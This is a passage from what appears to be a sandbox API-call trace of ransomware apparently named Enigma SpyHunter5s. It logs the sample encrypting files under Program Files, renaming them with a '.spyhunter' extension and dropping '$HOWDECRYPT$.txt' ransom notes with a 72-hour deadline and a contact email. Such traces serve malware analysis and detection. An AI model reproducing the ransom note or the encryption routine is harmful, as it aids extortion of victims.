0x2c34bd0 [0177.854] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce334, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce334*=0x2800, lpOverlapped=0x0) returned 1 [0177.873] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.873] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce334, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce334*=0x2800, lpOverlapped=0x0) returned 1 [0177.873] GetProcessHeap () returned 0x2c0000 [0177.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.873] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.873] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce374*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce334, lpOverlapped=0x0 | out: lpBuffer=0x25ce374*, lpNumberOfBytesWritten=0x25ce334*=0x4, lpOverlapped=0x0) returned 1 [0177.873] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce334, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce334*=0x30, lpOverlapped=0x0) returned 1 [0177.873] CloseHandle (hObject=0xb0) returned 1 [0178.127] GetProcessHeap () returned 0x2c0000 [0178.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.127] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll.spyhunter") returned 129 [0178.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.office.tools.v9.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.office.tools.v9.0.dll.spyhunter")) returned 1 [0178.128] GetProcessHeap () returned 0x2c0000 [0178.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.128] GetProcessHeap () returned 0x2c0000 [0178.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0178.128] GetProcessHeap () returned 0x2c0000 [0178.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e87568 | out: hHeap=0x2c0000) returned 1 [0178.129] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.131] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.131] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce2a7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce3d0, lpOverlapped=0x0 | out: lpBuffer=0x25ce2a7*, lpNumberOfBytesWritten=0x25ce3d0*=0x127, lpOverlapped=0x0) returned 1 [0178.132] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.132] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce3d0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce3d0*=0x2ac, lpOverlapped=0x0) returned 1 [0178.132] CloseHandle (hObject=0xa0) returned 1 [0178.132] GetProcessHeap () returned 0x2c0000 [0178.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3bae50 | out: hHeap=0x2c0000) returned 1 [0178.133] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce370 | out: pbBuffer=0x25ce370) returned 1 [0178.133] GetProcessHeap () returned 0x2c0000 [0178.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0178.133] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce368*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce368*=0x30) returned 1 [0178.133] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument.v9.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.134] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll") returned 190 [0178.134] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll", lpSrch=".txt") returned 0x0 [0178.134] GetProcessHeap () returned 0x2c0000 [0178.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.134] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce32c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce32c*=0x2800, lpOverlapped=0x0) returned 1 [0178.140] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.140] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce32c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce32c*=0x2800, lpOverlapped=0x0) returned 1 [0178.140] GetProcessHeap () returned 0x2c0000 [0178.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0178.140] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.140] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce36c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce32c, lpOverlapped=0x0 | out: lpBuffer=0x25ce36c*, lpNumberOfBytesWritten=0x25ce32c*=0x4, lpOverlapped=0x0) returned 1 [0178.140] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce32c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce32c*=0x30, lpOverlapped=0x0) returned 1 [0178.140] CloseHandle (hObject=0xa0) returned 1 [0178.141] GetProcessHeap () returned 0x2c0000 [0178.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.141] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll.spyhunter") returned 200 [0178.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument.v9.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument.v9.0.dll.spyhunter")) returned 1 [0178.142] GetProcessHeap () returned 0x2c0000 [0178.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.142] GetProcessHeap () returned 0x2c0000 [0178.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0178.142] GetProcessHeap () returned 0x2c0000 [0178.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cde148 | out: hHeap=0x2c0000) returned 1 [0178.142] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.143] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.143] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce29f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce3c8, lpOverlapped=0x0 | out: lpBuffer=0x25ce29f*, lpNumberOfBytesWritten=0x25ce3c8*=0x127, lpOverlapped=0x0) returned 1 [0178.144] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.144] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce3c8*=0x2ac, lpOverlapped=0x0) returned 1 [0178.144] CloseHandle (hObject=0xa0) returned 1 [0178.144] GetProcessHeap () returned 0x2c0000 [0178.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9970 | out: hHeap=0x2c0000) returned 1 [0178.144] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.146] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.146] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce29b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce3c4, lpOverlapped=0x0 | out: lpBuffer=0x25ce29b*, lpNumberOfBytesWritten=0x25ce3c4*=0x127, lpOverlapped=0x0) returned 1 [0178.147] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.147] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce3c4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce3c4*=0x2ac, lpOverlapped=0x0) returned 1 [0178.147] CloseHandle (hObject=0xa0) returned 1 [0178.147] GetProcessHeap () returned 0x2c0000 [0178.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4c448 | out: hHeap=0x2c0000) returned 1 [0178.147] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce360 | out: pbBuffer=0x25ce360) returned 1 [0178.147] GetProcessHeap () returned 0x2c0000 [0178.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0178.147] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce358*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce358*=0x30) returned 1 [0178.147] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.config" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe.config"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.148] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.config") returned 90 [0178.148] StrStrW (lpFirst="vsta_ep32.exe.config", lpSrch=".txt") returned 0x0 [0178.148] GetProcessHeap () returned 0x2c0000 [0178.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.148] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce31c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce31c*=0x74, lpOverlapped=0x0) returned 1 [0178.150] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff8c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.150] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x25ce31c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce31c*=0x74, lpOverlapped=0x0) returned 1 [0178.150] GetProcessHeap () returned 0x2c0000 [0178.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0178.150] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.151] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce35c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce31c, lpOverlapped=0x0 | out: lpBuffer=0x25ce35c*, lpNumberOfBytesWritten=0x25ce31c*=0x4, lpOverlapped=0x0) returned 1 [0178.151] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce31c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce31c*=0x30, lpOverlapped=0x0) returned 1 [0178.152] CloseHandle (hObject=0xa0) returned 1 [0178.152] GetProcessHeap () returned 0x2c0000 [0178.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.153] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.config.spyhunter") returned 100 [0178.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.config" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe.config"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.config.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe.config.spyhunter")) returned 1 [0178.153] GetProcessHeap () returned 0x2c0000 [0178.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.154] GetProcessHeap () returned 0x2c0000 [0178.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0178.154] GetProcessHeap () returned 0x2c0000 [0178.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5d9c0 | out: hHeap=0x2c0000) returned 1 [0178.154] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce360 | out: pbBuffer=0x25ce360) returned 1 [0178.154] GetProcessHeap () returned 0x2c0000 [0178.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0178.154] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce358*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce358*=0x30) returned 1 [0178.154] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.155] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe") returned 83 [0178.155] StrStrW (lpFirst="vsta_ep32.exe", lpSrch=".txt") returned 0x0 [0178.155] GetProcessHeap () returned 0x2c0000 [0178.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.155] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce31c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce31c*=0x2800, lpOverlapped=0x0) returned 1 [0178.157] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.157] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce31c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce31c*=0x2800, lpOverlapped=0x0) returned 1 [0178.157] GetProcessHeap () returned 0x2c0000 [0178.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0178.157] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.157] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce35c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce31c, lpOverlapped=0x0 | out: lpBuffer=0x25ce35c*, lpNumberOfBytesWritten=0x25ce31c*=0x4, lpOverlapped=0x0) returned 1 [0178.158] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce31c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce31c*=0x30, lpOverlapped=0x0) returned 1 [0178.158] CloseHandle (hObject=0xa0) returned 1 [0178.158] GetProcessHeap () returned 0x2c0000 [0178.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.158] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.spyhunter") returned 93 [0178.158] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe.spyhunter")) returned 1 [0178.159] GetProcessHeap () returned 0x2c0000 [0178.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.159] GetProcessHeap () returned 0x2c0000 [0178.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0178.159] GetProcessHeap () returned 0x2c0000 [0178.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9880 | out: hHeap=0x2c0000) returned 1 [0178.159] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce358 | out: pbBuffer=0x25ce358) returned 1 [0178.159] GetProcessHeap () returned 0x2c0000 [0178.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0178.159] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce350*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce350*=0x30) returned 1 [0178.159] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\VSTARemotingServer.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vstaremotingserver.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.160] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\VSTARemotingServer.dll") returned 92 [0178.160] StrStrW (lpFirst="VSTARemotingServer.dll", lpSrch=".txt") returned 0x0 [0178.160] GetProcessHeap () returned 0x2c0000 [0178.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.160] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce314, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce314*=0x2800, lpOverlapped=0x0) returned 1 [0178.169] SetFilePointerEx (in: 